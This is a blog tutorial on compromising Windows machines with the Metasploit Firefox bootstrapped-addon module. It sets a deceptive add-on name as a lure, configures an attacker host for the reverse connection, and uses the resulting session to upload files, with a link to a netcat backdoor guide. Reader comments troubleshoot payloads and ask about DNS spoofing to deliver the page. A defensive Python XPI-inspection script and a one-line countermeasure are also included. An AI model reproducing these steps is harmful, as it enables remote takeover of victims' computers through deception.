Hacking Windows using Mozilla Firefox Addon Social Engineering


Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5R1

Victim O.S : Windows XP SP3

Vulnerable Application : none (the people are vulnerable in this case)

Exploit Credits : mihi

After a long stretch of busy days, I can finally write another tutorial about Windows hacking. Today's tutorial is about "Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution".

metasploit.com describes this exploit as follows:

This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.

This method targets users who are not aware of the security issues involved when they install add-ons into their browsers.

Requirements :

1. firefox_xpi_bootstrapped_addon.rb

Step By Step :

1. Prepare the attack from your Metasploit console (view picture below)

Information :

Use the firefox xpi bootstrapped addon exploit, then set the payload (if you don't know which payload to use, run the show payloads command).

2. Next, view the available options with the show options command. I've already set the necessary options, as you can see in the picture below:

Information :

set addonname tweak firefox to load faster --> eye-catching name for social engineering purposes

set srvhost 192.168.8.93 --> IP address of the server that runs the exploit

set srvport 80 --> server port that serves the malicious website

set uripath firefox-tweaker --> makes the URL friendlier, like http://192.168.8.93/firefox-tweaker

set lhost 192.168.8.93 --> local IP address that receives the connection from the victim

set lport 443 --> port used to handle the connection from the victim

set target 0 --> sets the default target for this exploit (firefox)

3. If everything has been set up correctly, run the exploit command to start the exploit server that serves the malicious page.

4. When the user accesses the page http://192.168.8.93/firefox-tweaker :

and then clicks "Install Now"...

5. Our Metasploit console will get something interesting…

By using the sessions -l command we can list the active sessions created.

6. We need to interact with the session by using sessions -i id_active_sessions to get access to the victim system and upload some files there 😛

Here is the victim's file explorer after I finished uploading some files:

7. After that, maybe you can view my other tutorial about setting up a backdoor here: http://www.hacking-tutorial.com/computer/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/

Countermeasures :

1. Make sure you install add-ons only from developers you trust, or at least check their background by googling them first.
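
The Metasploit description and the countermeasure above both come down to judging an add-on file before anyone clicks "install". The Python sketch below is an added example, not code from the original post or from Metasploit: it statically inspects a legacy-format .xpi (a ZIP archive with an install.rdf manifest) and reports whether it is marked bootstrapped, whether signature files are present, and whether it bundles native files. The function names and the constructed sample archive are assumptions for illustration, and signature files are only detected, not cryptographically verified.

```python
import io
import re
import zipfile

NATIVE_SUFFIXES = (".exe", ".dll", ".so", ".dylib", ".bat", ".cmd", ".vbs")
# install.rdf may declare the flag as an element or as an attribute.
BOOTSTRAP_RE = re.compile(
    r'<em:bootstrap>\s*true\s*</em:bootstrap>|em:bootstrap\s*=\s*"true"', re.I)
SIGNATURE_RE = re.compile(r"^META-INF/[^/]+\.(rsa|dsa|sf)$", re.I)

def triage_xpi(data: bytes) -> dict:
    """Statically inspect a legacy .xpi (a ZIP archive) without installing it."""
    report = {"valid_zip": False, "bootstrapped": False, "has_bootstrap_js": False,
              "signature_files": False, "native_files": [], "findings": []}
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        report["findings"].append("not a ZIP archive, so not a valid XPI")
        return report
    report["valid_zip"] = True
    with archive:
        names = archive.namelist()
        report["has_bootstrap_js"] = "bootstrap.js" in names
        report["signature_files"] = any(SIGNATURE_RE.match(n) for n in names)
        report["native_files"] = [n for n in names if n.lower().endswith(NATIVE_SUFFIXES)]
        if "install.rdf" in names:
            rdf = archive.read("install.rdf").decode("utf-8", errors="replace")
            report["bootstrapped"] = bool(BOOTSTRAP_RE.search(rdf))
    if report["bootstrapped"] and report["has_bootstrap_js"]:
        report["findings"].append("bootstrapped: code runs on install, no restart")
    if not report["signature_files"]:
        report["findings"].append("no signature files: publisher cannot be verified")
    if report["native_files"]:
        report["findings"].append("bundles native executables or scripts")
    return report

def build_sample(bootstrapped: bool) -> bytes:
    """Constructed, harmless sample XPI used only to exercise triage_xpi()."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        flag = "true" if bootstrapped else "false"
        z.writestr("install.rdf", "<RDF><Description><em:bootstrap>%s"
                   "</em:bootstrap></Description></RDF>" % flag)
        if bootstrapped:
            z.writestr("bootstrap.js", "function startup(data, reason) {}\n")
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_xpi(build_sample(True))["findings"])
```

An add-on downloaded from an unfamiliar page that comes back as bootstrapped with no signature files is the combination this tutorial relies on, and is a reason to stop before installing.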

Hope you found it useful 🙂

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Website : http://www.vishnuvalentino.com

  • t

    It's truly annoying to have to look at images with watermarks that blur the information depicted in them. For this reason I am out. Good information but annoying watermarks.

    • v4L

      #t
      LoL…that’s okay 🙂 btw, this blog is dedicated to tutorials, so you learn by doing, not by looking at the pics (they only help you through the steps) 😛
      if you need the pics without watermarks, you can contact me with your real e-mail and we can make some deal for you to copy it…

  • PRASANTH

    Thanks for the tutorial. My doubt is if the victim has other than xp-3 then how can we use this add-on

    • v4L

      #PRASANTH
      I haven’t tried other OSes earlier than XP, but you can try… the steps are the same.

  • rere

    good job bro…
    bro, does this exploit work on Windows 7??

    • v4L

      #rere
      I haven’t tried it… maybe you can test it in your lab 🙂

  • S

    Can you DNS spoof this? If so, how can I? I know how to DNS spoof, but when I put the web address in it just says invalid?

    • v4L

      #S
      I’m not doing it, thanks 🙂
      but I can answer your question about how to check whether the DNS spoof works or not.
      you can change your DNS server to the one you already successfully spoofed (you can make your own lab on your LAN network) and check whether it’s redirected or not.
      maybe later I’ll post another tutorial about it

  • sumit

    when i exploit and an exception saying Exploit exception: The address is already in use ipaddress:portnumber(here i m not specifying mine).

    hope i will get reply soon on this.
    thanx 🙂

    • v4L

      #sumit
      maybe you’ve already run an exploit server before, or if you use the exploit on port 80, maybe your apache service was started. stop it using /etc/init.d/apache stop

  • sumit

    hii there 🙂
    i m having problem with SET mean i m not able to find it in backtrack5.when i try to upgrade i found this:

    Setting up se-toolkit (3.6-bt0) …
    svn: OPTIONS of ‘http://svn.secmaniac.com/social_engineering_toolkit’: Could not resolve hostname `svn.secmaniac.com’: Host not found (http://svn.secmaniac.com)
    dpkg: error processing se-toolkit (–configure):
    subprocess installed post-installation script returned error exit status 1
    Setting up w3af (1.2-bt1) …
    tar: pybloomfiltermmap-0.2.0.tar.gz: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Exiting with failure status due to previous errors
    /var/lib/dpkg/info/w3af.postinst: line 4: cd: pybloomfiltermmap-0.2.0: No such file or directory
    python: can’t open file ‘setup.py’: [Errno 2] No such file or directory
    svn: OPTIONS of ‘https://w3af.svn.sourceforge.net/svnroot/w3af/trunk’: Could not resolve hostname `w3af.svn.sourceforge.net’: Host not found (https://w3af.svn.sourceforge.net)
    dpkg: error processing w3af (–configure):
    subprocess installed post-installation script returned error exit status 1
    Errors were encountered while processing:
    se-toolkit
    w3af
    E: Sub-process /usr/bin/dpkg returned an error code (1)

    please help me out.

    • v4L

      #sumit
      how about your internet connection? it seems like your DNS server can’t resolve the domain name.
      if you’re using a shared internet connection, maybe you can try updating it outside peak time (e.g. 12:00am when people are already asleep 🙂).

  • sumit

    svn: OPTIONS of 'http://svn.secmaniac.com/social_engineering_toolkit': Could not resolve hostname `svn.secmaniac.com': Host not found (http://svn.secmaniac.com)
     error is showing while updating. Please reply on it
     

    • v4L

      #sumit
      are you connected to the internet?

  • sumit

    sorry for disturb you. i got my problem solved now :). Thank you.

  • sathish

    i getting error on “firefox….for user click to ‘accept’..”..then i’m not getting any response?…wat is the problem…then i will use on Back track OS only..In windows OS “local host:80/” is not loading….Now, what can i do?..let me please..

    • v4L

      #sathish
      Did it install the addons or not? Sorry, I didn’t get your question clearly enough

      • sathish

        add-on install successfully…but, i don’t any response appear on the terminal(msfconsole) window…

        And localhost is work on the back track Mozilla browser itself..it cannot load in windows Mozilla browser…

        • v4L

          #sathish
          can I know which version you use on the victim? Or you can try to downgrade it at http://oldapps.com

  • varun

    i hacked into my own pc (not sure of what exploit i used but i am sure that it is a remote exploit).i used armitage in backtrack 5 R2.sessions were created but i could not interact with the created sessions.

    • v4L

      #varun
      there are many types of exploits and payloads. When you get a session but can’t interact with it, maybe it’s because you set the payload incorrectly.

  • broo

    root@bt:~# apt-get upgrade
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    The following packages have been kept back:
    smartphone-pentest-framework
    0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
    1 not fully installed or removed.
    After this operation, 0B of additional disk space will be used.
    Do you want to continue [Y/n]? y
    Setting up se-toolkit (4.2.1-bt0) …
    svn: Server sent unexpected return value (504 Gateway Time-out) in response to OPTIONS request for ‘http://svn.trustedsec.com/social_engineering_toolkit’
    dpkg: error processing se-toolkit (–configure):
    subprocess installed post-installation script returned error exit status 1
    Errors were encountered while processing:
    se-toolkit
    E: Sub-process /usr/bin/dpkg returned an error code (1)

    Can someone help to resolve it?

  • Kelkut

    Hi, I have a virtual machine that acts as a victim with Win 7 Pro x64. I tried the tutorial but I have some problems. First of all, I can’t use the meterpreter payload, it isn’t compatible with the exploit. I can use it if I set target to 1 (native payloads), but doing this my Firefox browser crashes every time I try to launch the exploit.
    I tried to use the other payloads such as “firefox/shell_revers_tcp”, but with this type of payload I can’t copy files as I did with meterpreter reverse tcp. Is there a way to use the meterpreter shell? Is it a problem caused by my OS version?
    Thanks